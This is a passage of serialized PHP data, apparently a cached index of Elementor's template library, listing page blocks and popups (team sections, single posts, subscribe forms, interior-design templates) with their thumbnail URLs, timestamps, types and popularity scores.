Photography\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/02/PopUp_s.png\";s:12:\"tmpl_created\";i:1582092645;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/popups/classic-menu-photography/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:27:\"[\"Photography\",\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:614;s:11:\"trend_index\";i:451;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:332;a:14:{s:2:\"id\";i:9254;s:5:\"title\";s:17:\"product archive 3\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/product-archive-350-3.png\";s:12:\"tmpl_created\";i:1532954032;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/product-archive-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:15:\"product archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:107;s:11:\"trend_index\";i:43;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:333;a:14:{s:2:\"id\";i:9301;s:5:\"title\";s:13:\"Single Post 4\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3003.jpg\";s:12:\"tmpl_created\";i:1537440661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/single-post-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:222;s:11:\"trend_index\";i:394;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:334;a:14:{s:2:\"id\";i:9296;s:5:\"title\";s:13:\"Single Post 3\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3002.jpg\";s:12:\"tmpl_created\";i:1537440673;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/single-post-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:199;s:11:\"trend_index\";i:247;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:335;a:14:{s:2:\"id\";i:9313;s:5:\"title\";s:13:\"Single Post 5\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3001.jpg\";s:12:\"tmpl_created\";i:1537440798;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/single-post-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:177;s:11:\"trend_index\";i:228;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:336;a:14:{s:2:\"id\";i:9343;s:5:\"title\";s:13:\"Single Post 6\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3004.jpg\";s:12:\"tmpl_created\";i:1537443531;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/single-post-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:204;s:11:\"trend_index\";i:330;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:337;a:14:{s:2:\"id\";i:9349;s:5:\"title\";s:13:\"Single Post 7\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3005.jpg\";s:12:\"tmpl_created\";i:1537443903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/single-post-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:145;s:11:\"trend_index\";i:320;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:338;a:14:{s:2:\"id\";i:4690;s:5:\"title\";s:6:\"Team 7\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_1.png\";s:12:\"tmpl_created\";i:1520443348;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/team-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:231;s:11:\"trend_index\";i:237;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:339;a:14:{s:2:\"id\";i:4698;s:5:\"title\";s:7:\"Team 15\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_1.png\";s:12:\"tmpl_created\";i:1520443350;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-15/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:397;s:11:\"trend_index\";i:420;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:340;a:14:{s:2:\"id\";i:4706;s:5:\"title\";s:6:\"Team 5\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_2.png\";s:12:\"tmpl_created\";i:1520443352;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/team-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:142;s:11:\"trend_index\";i:132;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:341;a:14:{s:2:\"id\";i:4718;s:5:\"title\";s:6:\"Team 4\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_3.png\";s:12:\"tmpl_created\";i:1520443354;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/team-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:176;s:11:\"trend_index\";i:289;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:342;a:14:{s:2:\"id\";i:4727;s:5:\"title\";s:7:\"Team 13\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_2.png\";s:12:\"tmpl_created\";i:1520443356;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:358;s:11:\"trend_index\";i:423;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:343;a:14:{s:2:\"id\";i:4736;s:5:\"title\";s:7:\"Team 20\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_4.png\";s:12:\"tmpl_created\";i:1520443358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-20/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:141;s:11:\"trend_index\";i:153;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:344;a:14:{s:2:\"id\";i:4746;s:5:\"title\";s:7:\"Team 23\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_4.png\";s:12:\"tmpl_created\";i:1520443360;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-23/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:264;s:11:\"trend_index\";i:365;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:345;a:14:{s:2:\"id\";i:4759;s:5:\"title\";s:7:\"Team 22\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_5.png\";s:12:\"tmpl_created\";i:1520443362;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-22/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:290;s:11:\"trend_index\";i:299;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:346;a:14:{s:2:\"id\";i:4770;s:5:\"title\";s:7:\"Team 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_6.png\";s:12:\"tmpl_created\";i:1520443364;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/team-12-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:388;s:11:\"trend_index\";i:521;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:347;a:14:{s:2:\"id\";i:4781;s:5:\"title\";s:7:\"Team 16\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_7.png\";s:12:\"tmpl_created\";i:1520443365;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-16/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:258;s:11:\"trend_index\";i:235;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:348;a:14:{s:2:\"id\";i:9611;s:5:\"title\";s:16:\"Hello Bar | Sale\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2019/01/Top-Bar_Sale_small_01.png\";s:12:\"tmpl_created\";i:1546965350;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/popups/hello-bar-sale-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:567;s:11:\"trend_index\";i:517;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:349;a:14:{s:2:\"id\";i:13274;s:5:\"title\";s:38:\"Interior Design &#8211; Single Project\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/04/Single-Project-.png\";s:12:\"tmpl_created\";i:1586148723;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/interior-design-single-project/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"business\",\"interior design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:625;s:11:\"trend_index\";i:572;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:350;a:14:{s:2:\"id\";i:4793;s:5:\"title\";s:7:\"Team 18\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_8.png\";s:12:\"tmpl_created\";i:1520443367;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-18/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:191;s:11:\"trend_index\";i:174;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:351;a:14:{s:2:\"id\";i:9622;s:5:\"title\";s:19:\"Classic | Promotion\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2019/01/classic_promotion_small_02.png\";s:12:\"tmpl_created\";i:1546965896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/classic-promotion-02/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:571;s:11:\"trend_index\";i:501;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:352;a:14:{s:2:\"id\";i:13267;s:5:\"title\";s:35:\"Interior Design &#8211; Single News\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Post.png\";s:12:\"tmpl_created\";i:1586148728;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/interior-design-single-news/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"business\",\"interior design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:557;s:11:\"trend_index\";i:292;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:353;a:14:{s:2:\"id\";i:4801;s:5:\"title\";s:7:\"Team 11\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_8.png\";s:12:\"tmpl_created\";i:1520443369;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:332;s:11:\"trend_index\";i:463;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:354;a:14:{s:2:\"id\";i:9631;s:5:\"title\";s:38:\"Slide-in | Sale | Register | Subscribe\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2019/01/Slide-in_Sale_small_01.png\";s:12:\"tmpl_created\";i:1546968270;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/popups/slide-in-sale-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:596;s:11:\"trend_index\";i:652;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:355;a:14:{s:2:\"id\";i:13259;s:5:\"title\";s:36:\"Interior Design &#8211; News Archive\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Archiv-Blog.png\";s:12:\"tmpl_created\";i:1586148733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/interior-design-news-archive/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:30:\"[\"business\",\"interior design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:523;s:11:\"trend_index\";i:271;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:356;a:14:{s:2:\"id\";i:4809;s:5:\"title\";s:7:\"Team 19\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_9.png\";s:12:\"tmpl_created\";i:1520443371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-19/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:281;s:11:\"trend_index\";i:302;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:357;a:14:{s:2:\"id\";i:13251;s:5:\"title\";s:27:\"Interior Design &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/04/404.png\";s:12:\"tmpl_created\";i:1586148737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/interior-design-404/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:30:\"[\"business\",\"interior design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:688;s:11:\"trend_index\";i:599;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:358;a:14:{s:2:\"id\";i:4818;s:5:\"title\";s:7:\"Team 21\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_9.png\";s:12:\"tmpl_created\";i:1520443373;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-21/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:459;s:11:\"trend_index\";i:578;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:359;a:14:{s:2:\"id\";i:13244;s:5:\"title\";s:30:\"Interior Design &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/04/Footer.png\";s:12:\"tmpl_created\";i:1586148742;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/interior-design-footer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:39:\"[\"business\",\"footer\",\"interior design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:434;s:11:\"trend_index\";i:158;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:360;a:14:{s:2:\"id\";i:5045;s:5:\"title\";s:11:\"Portfolio 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_black_2.png\";s:12:\"tmpl_created\";i:1520443423;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/portfolio-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:570;s:11:\"trend_index\";i:678;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:361;a:14:{s:2:\"id\";i:9662;s:5:\"title\";s:33:\"Bottom Bar | Register | Subscribe\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2019/01/Bottom-Bar_Register_small_01.png\";s:12:\"tmpl_created\";i:1547009087;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/popups/bottom-bar-register-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:617;s:11:\"trend_index\";i:665;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:362;a:14:{s:2:\"id\";i:13236;s:5:\"title\";s:30:\"Interior Design &#8211; Header\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-interior-design.png\";s:12:\"tmpl_created\";i:1586148746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/interior-design-header/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:39:\"[\"business\",\"header\",\"interior design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:246;s:11:\"trend_index\";i:67;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:363;a:14:{s:2:\"id\";i:5157;s:5:\"title\";s:11:\"Subscribe 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/subscribe_white_1.png\";s:12:\"tmpl_created\";i:1520443448;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/subscribe-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"subscribe\";s:4:\"tags\";s:20:\"[\"form\",\"subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:341;s:11:\"trend_index\";i:387;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:364;a:14:{s:2:\"id\";i:13281;s:5:\"title\";s:37:\"Hello Bar | Contact | Interior Design\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp.png\";s:12:\"tmpl_created\";i:1586148801;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/hello-bar-contact-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:19:\"[\"interior design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:704;s:11:\"trend_index\";i:625;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:365;a:14:{s:2:\"id\";i:5165;s:5:\"title\";s:11:\"Subscribe 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/subscribe_black_1.png\";s:12:\"tmpl_created\";i:1520443450;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/subscribe-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"subscribe\";s:4:\"tags\";s:20:\"[\"form\",\"subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:494;s:11:\"trend_index\";i:538;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:366;a:14:{s:2:\"id\";i:5173;s:5:\"title\";s:11:\"Subscribe 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/subscribe_white_2.png\";s:12:\"tmpl_created\";i:1520443452;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/subscribe-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"subscribe\";s:4:\"tags\";s:20:\"[\"form\",\"subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:272;s:11:\"trend_index\";i:361;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:367;a:14:{s:2:\"id\";i:9690;s:5:\"title\";s:17:\"Classic | Contact\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2019/01/Classic_Contact_small_01.png\";s:12:\"tmpl_created\";i:1547011716;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/classic-contact-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:381;s:11:\"trend_index\";i:287;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:368;a:14:{s:2:\"id\";i:5181;s:5:\"title\";s:11:\"Subscribe 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/subscribe_black_2.png\";s:12:\"tmpl_created\";i:1520443454;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/subscribe-2-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"subscribe\";s:4:\"tags\";s:20:\"[\"form\",\"subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:422;s:11:\"trend_index\";i:528;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:369;a:14:{s:2:\"id\";i:9699;s:5:\"title\";s:33:\"Classic | Contact | Gym | Fitness\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2019/01/Classic_Contact_small_02.png\";s:12:\"tmpl_created\";i:1547015827;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/classic-contact-02/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:446;s:11:\"trend_index\";i:617;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:370;a:14:{s:2:\"id\";i:5189;s:5:\"title\";s:6:\"CTA 29\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_1.png\";s:12:\"tmpl_created\";i:1520443456;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/cta-29/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:8:\"[\"form\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:429;s:11:\"trend_index\";i:530;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:371;a:14:{s:2:\"id\";i:5198;s:5:\"title\";s:6:\"CTA 30\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_black_1.png\";s:12:\"tmpl_created\";i:1520443458;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/cta-30/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:8:\"[\"form\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:511;s:11:\"trend_index\";i:508;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:372;a:14:{s:2:\"id\";i:9571;s:5:\"title\";s:14:\"Fly In | 